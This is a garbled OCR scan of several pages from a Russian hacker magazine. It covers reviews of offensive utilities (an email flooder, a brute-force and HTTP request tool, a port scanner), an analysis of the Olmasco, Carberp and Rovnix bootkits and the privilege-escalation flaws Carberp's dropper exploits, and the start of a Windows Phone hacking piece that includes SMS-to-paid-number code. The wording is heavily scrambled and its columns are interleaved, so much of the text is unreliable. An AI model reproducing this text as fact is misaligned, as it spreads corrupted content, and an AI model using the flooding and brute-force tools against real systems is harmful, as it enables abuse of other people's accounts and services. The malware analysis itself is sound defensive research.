И нт ервал флуд а со в отношении дн ого мейла количество л яет пример н по части что до д ну-ка ми н уту, п оэ т ому соз д ате ль п ро­

просматривание д равным образом р екторий.

функ ц ияслужитд л пишущий эти строки выключениялюбо г что до

граммы рекомендуе т рабо т а т ь из ней со д е д ика,

РЕ

удаленного компьютера alias г руnпы колтун п ью ­

приближенно равно как быть этом д остигается д остаточно боль­

Rebuilder:

теровсвин д ойнаборт~

оптимизация РЕ -файл а; изменение базового а д реса РЕ- файла.

0.

возьми ла т да н равным образом ц е. По дд ер­

Б ыс т рое фотосканирование сети. П ро га осу щ ест­

TaskVieweг:

произведение дампов

0.

020 симво л ов

0.

Функция

Wake-On-LAN.

шая стремительность флуд а. Из удобс т на D eath-MoЬile Эта связка п озво ­

следуе т отмети т ь п одробный ло г текущих

РЕ Editor:

ляет переключать фаллос аленный комnьютер равно л равно

действий [действие, выпуск телефона, мыло!,

редактирование 0 05-заголовка;

гру п пульт комок п ью т еров, разве они поддержива ­

а да лог, на котором фиксируется, какие

опора же во относительно г по части вид т а РЕ + [64Ьitl;

корма функцию Wake - On - LAN.

сведения доставле н ы, а какие невыгодный дошли

Интуитивно общедоступный ан т ерфейс равно комфорт

прежде а д ресатов. Остальные фичи п рограммы твоя милость

просмотриредактированиетаблицимпорта/

ис п ользования сканера автор советую тебе оце­

сможешь изучи т ь п ри личном ознакомлении

экс п орта.

нитка самостоятел ь но.

от н ей .

приспосабливание

CRC;

ХАКЕР

03/158/ 0012


X-Tools

..

Автор:

f,:;:-- По- ~..:йк=""::..L---,

01cJ1o ПОТСIКО8:

00

О Nc. ru

@ Reg.ru Q Who.•

З.цержка (cet~:yttA):

regexp):

~=х:t::_и-т:т':':onoe~ ЬмюmeНJCТJ)OIOtchatset

~mi'{,m.JX]}-oтmi'IAomax торе!И1 СУIФОМ symЬol ~(tМ{. IМх)} • ОТ nWI АО IМХ букв d ·цифр, ·бука 0111Н цнфр) дльтернатноа: ~IU~T08.!Jitl,lJt2HT.A,

проверкасписка доменных имен; наличие трех различных движков

Windows.

равным образом сео шник ов всех мастей утилиту

проверки;

Dom aiп

сохранениеспискасвободных

IL:J

(TlJPT

что касается ~ТЬСА011еН&N9 01

~= СеобоА110:

.~chelo,nocne

Эа11ято:

котороrо 011.ет :

~~От 0 АО IOOМК!JJ08.!1 helo.ru)

Fiп deг. Как отчетливо с на­

звания, буква тулза предназначена

доменов на различных форматах;

чтобы поиска свободных доменных

если угодно от ть удлинить пре­

имен. Зачем тебе доменные имена?

рванную проверку;

Прога прямо безграмотный поможет

дальше, а поэтому практично п родать

теб е зарегистрировать la затем и продать! только viagгa.

н уждающимся! Та кже дозволено создать хороший SЕО-шоп получи хорошем до­ 81

мене- вариантов несть

05

Qст,апосъ:

021

Всего :

002

com, хотя

.

кое-что подобное вобрать в себя

полностью вроде . Наприме~ гляди

Основные потенциал программы:

0

Ouo<&oo:

~ nн6о 0 нnн 0 ОМ!ОМ ,a,b,t

Name

Их век допускается убрать по­

Текущее '*'CIICI nотакое

o{l,lD} l[atx:}{1,2}1\d{2}1}

.rul .com} -...eнooюнerult1»!

nн6о жчеn (т . е .

Пр едставляю твоему вниманию про­ стонезаменимую для того домейнеров

Статнсn«е работы

n-:

DOMAIN NAME FINDER, ИЛИ КАК НАЙТИ КРУТОЙ

Система:

ВЫхоА

{att 0*21 ...}·

0 ...&>2ЦНФоы

д....,._.

ДеtiстемА

Формат wаблона.(стиль

\w

al-chemisl. URL: al-chemisl.ru/ dnfinder.hlml .

проверкадоменных имен, задан­

регэпс интересах поиска ась? -т касательно почитай

ных шаблоном на стиле регулярно­

xakepviag га .com: [а -zH5, 0}viag га.соm.

го выражения;

Д ерзай!

Автор:

Автор :

Автор:

Z.Razor IZerveRTeaml. URL:

www.zerverteam.com.

Marcello Pielrelli & Gianni Baini. URL:

URL: z-oleg .com/secur/aps.

Сис тема:

Ьit.ly/ukWQSX.

Windows.

Систе ма:

Зайцев О. В. 1"CP-МU)(·ТCPPOOI.Sa....-Мula.дloтoнfll05

Система:

Еd\оТСР!f>(Э:I«нн•ит дмnрВIАета..ае

sytSIII

В.Мтаное

C8flaмc0tscaod

В.Мта

Windows.

с.р.нсо.уr-

Windows.

Н.СS.

В.Мта

c.plмcOuCМICII .... Ofi)/~TIТ&ni!OH!Iol! OoorGioo(ГIOOIP"•apa...:.-в...тa C:.S:.Ifl)f'ТP

&IДIIOH

ClpllpFТP

08Л11а

T10j$11IМI\ti'Panwha.TIOIIIII...В.д110н!lol!

SSI-+aipelp

-

Web Tool- сие

программа, предназначенная

чтобы автоматизации

GET-

да РОSТ-эапросов .

Соответственно, может применяться пользу кого

б рута/пареи н га/чекин га/на крутки хостов/ата­ ки/прокси-чекинга да т. п. Во всех полях программы lза исключением п олей Data равным образом U seгAgeпt l п оддерживаются следующие переменные :

#user# - ЛОГИН , #pass# - слово , #mdS(user)# -ЛОГИН В mdS, #mdS(pass)# - параль во mdS, #tokenl# - #tokeп(l-X)# - токены, #count# - тальман брута. В коде, полученном позднее запроса не без; токе­ нам, осуществляется разыскивание указанной строки.

На тему безопас н ого стирания данных велось

хотя адски нужная программа. Она проел у шива­

ее равно представить тебя из появляющийся тематиче­

ет до некоторой степени сотен портов [указанных на обнов­

ской утилитой. Имя ей-

ляемой базе д а нных программыl, имитир условная единица т

Files Тегm i паtог.

Эта

у т илита обеспечи вает тайность

реальность получай ни х уязвимых сервисов да анализи­

твоих данных, вполне удаляя приватные

рует весь подключения за сим портам.

д окументы, изображения, ви д ео равным образом остальные фай­

Эта план на основном предназнач ена пользу кого

лы хорошенько перезаписи свободного дискового

обнаружения хакерских атак. Как известно,

пространства. В процессе «стирания>> файлов

поиск портов помогает ввести образ

их предмет порядочно в один из дней перезаписы­

операционной системы да обнаружи ть потен­

вается случайными данными равным образом предопреде­

циальноуязвимыесервисы[например,почту

ленными символами, таким образом, восста­

тож web-cepвepl . Посл е сканирования портов

нов равно ть сии файлы короче нельзя. Кроме того,

многие сканеры определяюттип сервиса, пере­

пакет позволяет <<очистить>> свободное

давая тестовые требования равным образом анализируя его ответ.

площадь от через сложных алгоритмов

Утилита

шифрования, с целью того дабы невозвратимо

ипозволяетоднозначноустановитьфактатаки. Кроме этого, обслуживающая программа может брать на вооружение ся в целях

были удалены небезапасным способом.

выполнения следующих задач:

Программапредоставляет получай выбордевять алгоритмов удаления инфы :

Режим sоuгсе-файла:логины равным образом парали

на виде пick;pass берутся изо одного файла.

0.

Режим двух файлов: логины отд е льн о, паро­ л да отд ельно.

З.

Режим цикла: проект сработаетука­ занное состав присест кроме использования ЛОГИНОВ И паролеЙ.

ХАКЕР

03/158/2012

APS проводит пересчет не без; атакующим

извести аж те файлы, которые прежде

даже если нужно, п осле Х следующих сименс волов! и выполняется впредь до коне ч утнапиштим строки !ча щ е всего она состоит с символа< иначе «1. Прога имеет

0.

APS [Aпti Ро г t Scaпneгl- сие маленькая,

поуже счет потерян разговоров, хотя ваш покорный слуга хочу продлить

Счи т ывание н ачинается махом затем н ее !или,

три режима:

Вlдl•аное

-

0.

П севдослучайный.

0.

Британский ,

З.

Случайный.

0. 5.

Р оссийский, ГОСТ Р50739-95.

0220.22-MIEI. 6. Н емецкий, VS IT R. 7. Канадский, RCPM TSSIT OPS-11. 8. Алгоритм Брюса Шнайера . 9. Алгоритм Питера Гутмана.

проверка сканеров портов равно насчет верка

по части

проверка файервола равно операционный

по отношению

связывание сетевых червей;

по части

отлаживание антитроянских равно антивирус­

тенетный безопасности;

HMG 055.

Алгоритм министерства обороны США,

об наружение разного рода атак; о

кон трольего работы;

DoD

ных программ, систем

IDS;

фиксация троян скихпрограмм,пере­

численных во базе.

075


Матросов Лександр , S en io г ma lw aгe ге sе агс h е г,

ESET ·

есепая v китов САМЫЕ ТЕХНОЛОГИЧНЫЕ УГРОЗЫ 0011 ГОДА В ВЕСЕЛЫХ КАРТИНКАХ Март сего года- самое правильное минута для подведения итогов лета прошлого. Ну, сам по себе понимаешь: новогодние перерыв ранее позади, накануне майских

Load MBR

праздников покамест далеко, умный светлая- можно и итоги подвести.

rea d mod e

LoadVBR 1

rea d mode

0

-----------,

load malicious : MBR/VBR __________ ,1

Load bootmgr о

Bootkit

РоС

evolution:

./ Mebroot (2007)

./Vbootkit (2007)

./ Mebratix (2008)

./ Stoned Bootkit (2009) v' Evilcore х64 (2011) v' Stoned х64 (2011) 1. Развитие современного

буткитастроения

,----------NT kernel :

Bootkit Threats evolution:

./ еЕуе Bootroot (2005)

./Vbootkit v2 (2009)

Рис.

в отношении

read mode/ protected mode

, ___________ modifications ,1

Load winload.exe о г winresume.exe

./ Mebroot v2 (2009) v'Oimarik (2010/11)

,-----------, load rootkit

read mode/protected mode

./Oimasco (2011) Load kernel and boot start drivers

./Rovnix (2011) v' Carberp (2011) Рис.

0. Схема

загрузки буткита

driver , ___________ ,1


Веселая трое буткитов

Рис . З . Модифицированная

VBR в зараженной системе

MBR Code

MBR Code

Partition ТаЫе Entry #1 Partition ТаЫе Entry #2 Partition ТаЫе Entry #3 Partition ТаЫе Entry #4

•••• •• • • ••• • •• •• •

.......

Partition ТаЫе Entry #1 Partition ТаЫе Entry #2 Partition ТаЫе Entry #3

MBR Data

Bootmgr Partition

Bootmgr Partition

05 Partition

..

Partition ТаЫе Entry #4

MBR Data

........

• ••• • ••·=·• ••• ..•,• . -=· • • ..... •

.....

...

05 Partition

............. Unpartitioned Space

Olmasco Partition .i

Before infecting

0. Раздел с целью

D

комnонентов буткита

'

After infecting

Empty Partition Entry Рис .

:·-:

Active Partition Entry

Existing Partition Entry

Olmasco

т стеклышки з р ения развит_ия во ре д что касается н осного ради гр аммнаго обе­

ядра да используют интересны е технологии. Развитие современно­

спечения п ро ш е д ши равно го д дозволяется дать характеристику наравне бадняк

го б у ткитсстроения дозволено набросать во виде схемы , представлен­

развития 04-битных буткито во . Е сли на

утнапиштим нате рис.

0010

году ми был

известный как только относительно д ан бу т горбач д ля 04-бит н ых систем- Win64 /0imaгik

0.

Здесь отображены самый значимые моменты в духе во развитии

ITD L41, ведь на этом году наша сестра п что до л учили интересн ы й выхлоп с Rovn ix, ZeгoAccesslupdate l , TDL4 Iupdatel, СагЬегр, Olmasco !также извест ­ ный в качестве кого MaxSSI. И сие т насчёт л ько те у г розы, кото р ые умею т обходи т ь

диска IM BRI либо — либо видоизмененный вслед г рузочный код, кой об т рабатывается

защи т ные живое золото н измы пр по части на ерки ц иф р овой подо п иси д ля мо д ульишко

сызнова накануне основы инициализации операционной системы, вредонос-

Р в рассуждении С-реализаций, приближенно да во воплощении сих технологий на боевых вредоносных программах. Заражая нагрузочный квадрант мановение ко ого


Рис.

0. Функция загрузки файла изо скрытой файловой системы- Olmasco

получай моя особа пакет может почерпнуть ревизия надо загрузкой компо­

ТА-ДА-ДАМI ПЕРВОЕ MECТQI

нентов операционной системы, дабы затащить модификации на настоящий

Итак , во-первых поле объединение технологичности занимает

процесс.

чтобы повадки не было интересна на первую кортеж тем, сколько модифицирует

Именно сии модификации на дальне йшем позволяю т обходить механизмы проверкицифровой подписи да использовать вредоносные

Эта

VBR [Volume Boot Recoгdl равным образом имеет полноценную собственную файловую

систему с целью хранения дополнительных модулей равным образом других ком­

драйвера на объезд защитных механизмов. Но давайте так-таки вер­

понентов. Как выглядит модифицированная

немся ко нашему хит-параду сложных угроз, тем сильнее что-нибудь их спектр

системе, показано получай рис.

действ да тельно ужас широк.

Dlmasco.

VBR

возьми зараженной

0.

Большинство антивирусных продуктов научились результативно

В прошлом году на первом месте район нашег по части рейтинга занял Stuxпet,

справля ться не без; активным заражением буткитам и, использующими

а во одном изо последних номеров аз многогрешный ранее описывал машины рабо­

модификацию

твоя милость Duqu [обнаруженного в осеннее время младшего брата Stuxпetl. Но , увы,

нее сказа ть , стали рыть глубже с целью противодействия антивирусам .

MBR.

Однако злоумышленники почесали дальше, а точ­

возьми оный единожды ему малограмотный предназначено попасть на отечественный рейтинг, круглым счетом вроде львиная

Это вызвало у некоторых антивирусных вендаров определенные

часть используемых им технологий ранее знакома нам объединение червю

сложности, во результате а злоумышленники получили возмож­

Stuxпet [хотя, разве бы авторы проплатили рекламное луг во жур­

ность оста ваться незамеченными во системе. Ус тройство внутрен­

нале «Хакер>>, наша сестра бы поместили их сочинение возьми суп помещение :11.

ней файловой системы вот и все заслуживает отдельной статьи.

Duqu

разработан получай основе пирушка а самой программн ой платформы.

Из его Запомнившихея особенностей имеет смысл отметить, пожалуй, только эксплуатацию шикарной 0-dау-уязвимости

CVE-2011-3402

В конце жесткого диска создается полновесный раздел, во котором

размещаются до сей времени компоненты буткита [рис.

01 .

Файловая доктрина хра нит промежуток времени равно дату создания файла да аж

к загрузки вредоносного стих на база равно повышения привилегий,

контрольную сумму в целях проверки целостности. С точки зрения

же сие поуже положение в целях отдельной статьи ;l.

технологичности буткит от этой файловой системой вследствие ее


Веселая тр ойка буткитов

структуре превосходит весь кое-кто угрозы, использующие скрытые

файловые хранилища. Сигнатура корневой дире ктории скрытой

файловой системы приведе нате бери рис.

0.

Функция загрузки фай ла с скрытой файловой системы в руткит-драйвере представлена сверху рис.

ЧЕТЫРЕ РАЗНЫЕ УЯЗВИМОСТИ

0.

Так в качестве кого программа-драйвер написан возьми чистом С без участия обфускации, нам уда­

рогач декомпилировать ко д драйвера возле помощи

IDA

равно

СЕЙЧАС УСТАНОВЩИК ИСПОЛЬЗУЕТ

Hex -R ays

равно таким обраЗ'ом воссоздать его структуру. Не больше интересен равным образом эксплуатация модификации системы умереть и неграмотный встать минута

ДЛЯ ПОВЫШЕНИЯ ЛОКАЛЬНЫХ

ПРИВИЛЕГИЙ В СИСТЕМЕ

загрузки. Э т через кончено смешанный процес от проиллю ст рирован на рис.

0.

Д ополнительно есть смысл пометить равным образом так , в чем дело?

Olmasco,

ТУ- ДУ-ДУМI ВТОРОЕ

как бы равно

имеет буткит-часть, которая модифицирует библиотеку

TDL4, kdcom.d ll.

MECTOI

Второе поляна по мнению праву занимает обно вленная трансформирование СагЬегр, ко­ торая обзавелась хватит за глаза любоп ытным буткит-функционалом.

Именно симпатия отвечает после отладку ядра быть опора по отношению щишки WiпDbg, а после ее модификации настройщик отнюдь не может подсоединиться ко системе на

СагЬегр заключая позволяется прозвать безвыгодный всего одной с самых техно­

удаленной отладки. В итоге вариантов остается никак не приблизительно много: либо

логичных, так да самой жадной вредоносной программой прошлого

иссле д овать весь мо д ули во статике [в случае если бы их ранее посчастливилось

года. Этот бутки т атакует заместитель олее извес т ные дистанционные

извлечь с скры пирушка файловой сис темы] , либо сноровить во ернуть

сис тем ы саман во ско го обс л уживания, же р ечь без дальних разговоров невыгодный об этом.

ориги н альн ы й

Впервые идентич ный буткит-ф унк ционал появился у Wiп64/Rovпix,

kdcom.dll

равным образом отгружать вредо н осный парус вр у чн ую.

Исследовать функцио черный нал бу т кит-части равным образом невыгодный та к-т в рассуждении просто,

котор ый во нача ле года д оставил нема л по отношению хлопот пользователям

а во этом нам поможет эмулятор

рунета. СагЬегр равно Ro vп ix базируются н а одном буткит- коде, инфор ­

ранней стадии загрузки прямо Итак,

Olmasco

Bochs равным образом отладка из IDA Рго.

системы в самой

мация касательно продаже которого неоднокра т да во стреча лась сверху разны х

получил на первом месте полоса вслед за технологичность соб­

кибе ркрим ина льных форума х во начале пр ош лого го истинно .

ственной файловой системы равно характерный инструмент буткита , который использует ря д наработок изо

TDL4 равным образом

Изнача льно

Continue kernel initialization

Loal MBR

Load "drv32"

is loaded апd executed

iпfected

ог

"drv64"

Call KdDebuggerlnitialize1 from loaded kdcom.dll

LoadVBRof mallclous partltion

substitute kdcom.dll with "dbg32" относительно г "dbg64"

VBR is loaded апd executed

Load "\boot" from mallclous flle system "\boot" is loaded executed

Рис .

апd

Hook BIOS lnt 03h handler load original VBR

Load wlnload.exe

Substitute Ems E пaЬied optioп with Wiпpe

VBRof originally active partition is loaded апd executed

Load kernel and boot start drivers

Рис .

0.

Bootmgr is loaded апd executed

имел только лишь функционал для того пользова­

со бутки ведь м. В процессе анализа свежих дропперов ми попались

после ностро нестандартных системных модификаций .

mЬг

Carberp

тельского режима, только прошлей осе нью были создан ы модификации

затрудняет излечение

Read bcd

Процесс модификации системы закачаешься минута загрузки- Olmasco

0. Покупайте наши буткиты!


Р ис.

00. Д е ко м пилированны й

для од , отв е тс т во е нны й ради вот как сплуатацию у автор звимастей -

для иллюминаторы любопытные строкавые константы изо ранее распакованного

установщика [рис .

Рис.

Carberp

01 .

01 . Снятие х уков

равным образом спnайсов из системны х функций на исполнении

Carberp

MS11-011 [win32k.sys SystemDefa ult EU DC Font vul nl; NЕТ Runtime Optimization vuln l http:l/osvdb.oгg/show/osvdЬ/71013 ).

Эти строчки махом наве л равно нас сверху мысли по части системных модифи ­ кациях, производимых буткитом. Н в отношении ну-кася снача л а погово р им о дропп е ре, тот или иной заключает целехонький букетище зксплойтов интересах повы­ шения привилегий. В первую каскад их существование свя з ано из тем ,

Д еком п илированный код, эксплуатирующий уяз на имос т и, п ри­ ве д ен получи и распишись рис.

0О.

Ещ е одной инте р есной особеннос ть ю работы д р а п пе ра мы на ля ­

что-то пользу кого установки буткита требуются льготы администрато-

ется со н ятие различ н ых хуков да сплайсов со некотор ы х систе мны х

ра другими словами системы. У корпоратив н ых пользователей [а не зачем иное они

ф у нкций переднепосредствен н ым из-за п уском бу т ки т- рот н овщика

являются целью злоумышленнико в! , имеющих д оступ для ДБ О, может

[ ри вместе с .

п росто невыгодный состоять п р ав нате включение ис п олняемого файла из высокими

011.

Это своего рода объезд различных п есочниц равным образом сре д со т на мони ­

п ривилегиями, равным образом мето д ы социальной инженерии тогда ранее безвыгодный по­

торинга, которые ис п ольз у полуют хуки во пользо на ател ь ском режиме.

могут. П озтому без дальних слов рот н овщик эксплуатирует четверка единожды н ых

В процессеработы буткит-части на обхо д пушнина н измо на для во ерки

уязвимости ради п овышения локальных близ во илегий на сис т еме:

М 010-073

lwin32k.sys Keyboaгdlayout vuln l; М 010-092 [Task Scheduleгvu l n);

числовой до д писи да других средств следовать щ равно твоя милость з а гружае т не без; пишущий эти строки вр е ­ д онос н ый драйвер. За д ач е й сего драйве р а автор вл яется на безвыгодный др ение полезной нагрузки на адре не без; н ое пространс т закачаешься u sе г-m оdе-процессов . Д по части сего испо л ьзовались методы внедрения на сообразно ль зо на а т е ль ском

р ежиме, такие ка для N tQueueApcT hгead[J/NtResumeT hгead[). Фак т ически С агЬегр помогите т оит изо трех частей: бутки т- части, за­

ИНТЕРЕСНОЙ ОСОБЕННОСТЬЮ ДРОППЕРА ЯВЛЯЕТСЯ СНЯТИЕ

ХУКОВ И СПЛАЙСОВ С НЕКОТОРЫХ СИСТЕМНЫХ ФУНКЦИЙ

гружаемого ей д райвера, равным образом dll-модул пишущий эти строки , на н ед р яемо г что до др айвером в п ользова т ельском режиме. Странно, что такое? единожды ра ибо тчи ки далеко не ис ­ пол ь зовали постоянно возможнос т и, которые им пре д ос т авл моя особа ет загру ­

женн ы й ко д н а уро на никак не ядра системы . В се перехваты системных функ ц ий хайло н авливаю т ся поуже на малограмотный д ре н ным мо д правовед на по части л ьзо­ вательском режиме. Их ле г ко об н аруживаю т та кие инс т румен т ы, как

GM ER

сиречь

RKU.

СагЬе г р получил на втором месте помещение после техноло г ичность, та для в духе з т по части


Веселая тро йка буткитов

·-----success ·--· 1

Loal MBR

-----·fail----·

0 1

'

Real mode

r-----

---------- Win 0000·------------ •

0

LoadVBR

0

Real mode

WinXP r - - ...

' ',

>< ·с:

>

что касается

0

,

.

Load bootstrap code

0:::

0

success

,

~

fail

с:

~

0

real mode 0protected mod

0

'

Determine 05 Digit Capacity

Load bootmgr

0

0 1 1

'

lnstall Corresponding Kernel mode Driver

rea l mode 0protected mod

Call SheiiExecuteEx API with "runas"

Load winload.exe or winresume.exe

0

0 1 1 1 1 1

Overwrite Bootstrap Code of Active Partition

________

lnitiate System Reboot

Рис .

02. Заражение системы

буткитом

.,

.

real mode 0protected mod

' '

Self Delete and Exit

Рис.

Rovnix

главный банковский буткит, какой впечатление ивн в рассуждении работает ко ак

на х86·, та ко равным образом во х64-сис тем ах. В

0012

Load kernel and boot start drivers

г относительно д у, автор этих строк мысль ю, наш брат до сего поры никак не крат

Итого, Rovпix стал п ервой угрозой, соответственно казав ш ей неэффектив­ ность многих антивир усных пр касательно д ук тов , которые проверяли целост­

ность токмо

услы шим об этой вредоносной пр ограмме.

03. Загрузка Rovnix

MBR.

В итоге градиент атаки, используемый буткита ми,

итак утилитарно неисчерпаемым, сей поры нераздельность си­

ТРЕТЬЕ МЕСТОI БЕЗ ФАНФАР

стемы проверяется нате поздних этапах загрузки системы . По сути,

Треть е п оче т ное район нашего хит-парад а занимает Rovпix,

немедленно систем а загр ужае тся всегдананедоверенной платформе.

ко т что касается рый первым стал испо льз что до вать модификацию областей за­

Возможно, методика SecuгeBoot исправит эту ситуацию во WiпB ,

грузочного кода, насчёт тличног в отношении ото

же сие хорош сызнова безграмотный поспешно .

проиллюстрирован получи падди .

MBR.

Процесс заражения системы

02.

Как видать с б л ок - схем ы , во процес се заражения, ради исключе ­

ЗАКЛЮЧЕНИЕ

нием э тапа модификации В ооtst гар- кода, недостает ни ложки необычного.

В этом году на нашем хи т-параде самых технологичных у гр вал

B oo tstгap- э ведь ча ст ь загрузчика, которая отрабатывается вмиг

присутство мотай отсюда вр едонос ны е пр об гр аммы, имеющие неодинаковый

п ос ле инициализации VBR IVol ume Boot Recoгd], н по части п еред загруз­

буткит-фу нкционал равно со дер жа суп е скрытые файлов ые системы.

каковой сис темног относительно bootmgг. Именно сие да позволяет опосля

Всё сие на первую очере дь пр извано скрыва ть вредоносные п ро­

возыметь получай загрузку системы. Ro v пi x, во вкусе равно

граммы по отношению т антивирусных продуктов, п ротиводействовать лечению

Olmasco,

использует

скр ыт ую файловую сис тем у интересах х ран ения своих компонентов равным образом по­

активного заражения равным образом утруднять произведение криминалистиче­

сле д ую щег касательно д оступа ко ним около помощи буткит-ко ага , но, на отли ч ие

ской экспертизы. В наступившем году уймись жительствовать малограмотный станет, равным образом аз многогрешный

об т файловой системы

думаю, сколько многие с описанных во этой статье векторов сделано себя

Olmasco,

симпатия устроена кончено не мудрствуя лукаво ,

ведь есть, п в отношении сути, представляет из себя легко земля диска , во кото­

исчерпали да во нашем следующем хит-параде, вроде , появятся

рую записаны данные, равным образом невыгодный имее т какой-либо сложной структуры.

угроз ы , использующие специфические особенности со вр еменных

В пр ан цип е, во описы ваем ом вместе с л учае сия облас ть не без; д анными нужна

процессоров, такие равно как многаядерность да аппаратная вирт уализа­

едва интересах того, дай тебе во проце ссеработы буткит был способным просмотреть

ция . Но со точки зрения реальных угроз сие правдоподобно всего-навсего на слу­

необходимые компо ненты равно занять место ими насчёт р игинальные п ри вслед за ­

чае их рентабельности, поскольку, во вкусе показывают мои наблюде­

гр узке системы.

ния, кибеприступ н ики- до чрезвычайности прагматичный народ. :Х:


MALWARE

Юреня «yurembo» Язев

ь

в целях мобильных

lyazevsoftldgmail.coml

-

Чтобы сотворить

предмет класса

MediaEiement (nроизводным от него является

спинар mediaSoundl,

<<ОКОШеК>>

ment Height="120" Name="mediaSound" Width="160" />.

ИССЛЕДУЕМ МОДЕЛЬ БЕЗОПАСНОСТИ

wjndowsphonehack·

ПОПУЛЯРНОЙ ОС ДЛЯ СМАРТФОНОВ НАПРАКТИКЕ Вообще-то на нашем журнале работает будет фанатов винды, скажем так пишущий эти строки

либо — либо отечественный редактор, ветврач Лозовский . К счастью, симпатия адски обижен тем фактом, сколько MS жирно будет целую вечность тянула от обновлением его любимой WM6.5, и вследствие чего поручил ми порядком разобраться, вроде во новой системе обстоят конъюнктура со малварью да уязвимостями. Вперед!

потребно во ХАМL-код добавить такую строчку: <1\ediaEle-

Н&~Ш~- хороший сайт, содержащий много интересной мифы что касается хаках WP

0-7.5.

На диске находятся

три nроекта,

работа которых описана во статье .


Мал на арь дл моя персона моби льн ых <<окошек>>

rn

насчёт недавнего време н да во стане

WP бы л в отношении дос т аточно спокой Windows Phone 0.5

.

но, а на середине декабря сверху п л атфо р ме

__

..,......

.,_" ....,._ .,_,_ ..__"_..,

~ .._ DМc....,.tGIIOI

врасплох был зафиксирован фак т р е бут а операцио нн ой

..........__ . ,..м~

.......

сис т емы, во результа т е которо г о, п осле получе н ия специал ь же по-под г о­

товленного СМС-сообщения l g oo. g i /Y Ыru l , отправления через п равки да чте н ия эсэмэсок перестает работат ь . Тако го а эффек т а мож н что касается д оби т ьс автор , от­

__ "_

;;. ~.н-s,

.,.

··

- ~.ь.~

- ~tT)'II*

VIO,Pf)UIII).OЦ.C

0

А доклад , творец которо го не без этого во т айле н арабочем столе, может

-~~ 4

.. ~т ...

.

._...

0&JIW<ci18IOIICIIIOO

...__ ... ..,..._,

,_,. ......... _"

~~~OIIUI((-U­

~~-)IN

...... ......,., ......,., .,.,.......... _,. .,....... ...... ,_,., _., lt(6.JoU.tUZ

~н.fкоо

,.,

"'"'-""" ...............

правив особое уведомление изо социал ь утнапиштим се т равно [ н апример, с Facebookl.

.__"_..,

f'Ю1VI-161.\-.4W.~D<IfD){C.U....

.,.,.,...,._,-.....-ao>J

заблокиро во ать однако функции телефона! Этот ба г- отнюдь не новинка во мире мобильных устройств, во свое на ремя им да работа л да равным образом айфо н ы, и андрои д ы .

Ес л равным образом невыгодный заимствовать закачаешься во н има ни е п осле д ний рассмо т ре нны й э 3 зод , т в рассуждении

оный ба г далеко не приближенно уже равным образом критичен, особенно до срав н ению со СМС - атакой

Реда для тируем книга

получи и распишись айфон, которая позволяет атакующему нажить п олный кон т роль над устройством. П ользова т ели практически д рои д ев равным образом были во опасности: << СМС-смерть» выкидывала автомат во офлайн или, аюшки? инда хуже,

Parameter равным образом ранее со временем

предоставля л а атакую щ ему в области лн ый дос т у п для системе .

ви на единицу, PortaЫe D eviceNameSpace E xclude F romShell- во нуль,

ShowlnShell

устано­

EnaЫe l egacyS up port - во е д ини цу.

В настоя щ ее во р ем автор изо << т рех для ит ов>> токмо

WP 0 уязвима д л я 2012-rol, обновле ния , Microsoft на последнее эпоха

СМС-атак . Когда п да сались сии строки [я нв арь устраняющего данный галлюцинация , снова никак не было.

измени следующие ключи:

Использо во а т ь

WP 0 вроде

модем вне сnец да аль н ых nриготсе л ений

т оже было нельзя. Н о, для счастью , на

WP 0.5 сие

разлад бы л что до

достаточно нередко выпускает апдейты интересах своей мобильной оси , почему

исправлено . Правда, последнее термин всё в одинаковой мере остается вслед операто­

будем надеяться, что такое? поправка последует архи быстро .

пунш сотовой связи, да буде авиатариф безграмотный п ре д назначен пользу кого расшаривгния интернета, так им п ридется nользова т ьс мы исключите л ь н об получай конструкция н ом

девайсе

[xe-xel.

ХАКЕРСКИЕИССЛЕДОВАНИЯ Перейдем через обзоров чужих ха ко во ко реализации собстве нн ой имущество вари.

безвыгодный безраздельно присест сломать систему, поз т ому наш брат рассмотрим только лишь некото ­

рые с сих ха ков, самые вам д ающиеся да общест во енно полезные.

Несмотря в то, чт что касается WP во целом выгля д ит <<неломаемоЙ>> сис темой (что MS ;11, у хакеров, в качестве кого у Мальчи ш а - Кибальчиша,

:1

будет вот так фунт д ля

Как известно, ради разлечить построение по-под управлением необходимо прошествовать утомите л ьную проце дуру ре г истра ц ии

Phone Marketplace

WP 0, в Windows

глотать тайные ходы, равным образом их неграмотный забросать .

равным образом сверх того после пл а т равным образом т ь

тов>>. Однако умельцы изо

09 <<веч н озеле н ых прези д ен­ ChevronTeam изготовили ту л зу ChevronWP7,

П риложения на

WP выполняю тся

соответственно д

.NET во

ок р ранее н ии

Silverl ight.

Это значит, что-то н ам н ичего малограмотный придется nиса т ь из нуля да дозволительно буд ет воспользоваться готовым

которая разлочивает систему.

Эта утила также неграмотный бесплатна, однако после нее быть д ется дать несравни­

API.

П роще итого отправи ть

SMS

держи оплачиваемый

номер. Так пусть его бери ш е <<nолезное>> использование -де л ае т сие приёмом

мо в меньшей степени - девять <<nрези дентов>>. Она кор р ектно функционировала

позже запускаl Д ля того в надежде дозволяется было обрабатыва т ь действие

лишь бери

жизненного цикла приложения, полагается включить следующее относительно ­

WP 0,

а приближенно в духе

Mango MS

пофиксила ба г на

ис п ользова л а nрограмма, так теп е р ь ути л а

WP 0.5, который от Chevro nTeam никак не работа­

странство име н :

ет. В принципе, глотать е щ е безраздельно д а д айский от п особ разб л окироват ь устройство про запуска сторо н них п риложений. Дл пишущий эти строки каждого произво ­

usi п g System .Wiп dow s.N av i gati o п ;

дителя симпатия со во ой, контингент действий, необходимых чтобы актив

цели, равным образом различается. Как говорится, Гугл на помощь!

:1

Кроме того, желательно приплюсовать место имен Microsoft.Phone. Tasks, воеже работ ать со SMS да мылом (см. н иже ! . За тем напишем об­

П ользователь новой мобильной <<фо рточки>> малограмотный имеет доступа

работчик события, во холм н икаю щ его пр да заг р узке приложе н ия:

ко файловой сис т еме смартфо н а. П что касается д ко л ю ч е нн ое склад далеко не ото­

бражается во Эксnлорере что д насчёт п насчёт лн да тель ны й диско во ый н акоnи т ел ь, но сие несомненно исправить. Сnер во а отключидевайсот компьютера с целью

protected override void

чистоты эксперимента, открой вычитчик реес т ра, разверни область

{

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControiSet\Enum\USB, там найди строку ZuneDriver, дальше открой ее материнскую во етку Device

БЕЗОПАСНОСТЬ Посмотрим , в чем дело?

Microsoft сделала с целью безоnас ­

0.

стае имен

в й от истеме смартфона . IКазало от ь бы , э в таком случае

ради несомненно запоминать эмпирика .

В yes ь шифр уnравляемый !выnолняет вместе с мы nод

ограничивает наши возможн по отношению со т равным образом , н о, кабы

впасть в задумчивость , много раз л равным образом тебе nр их одится

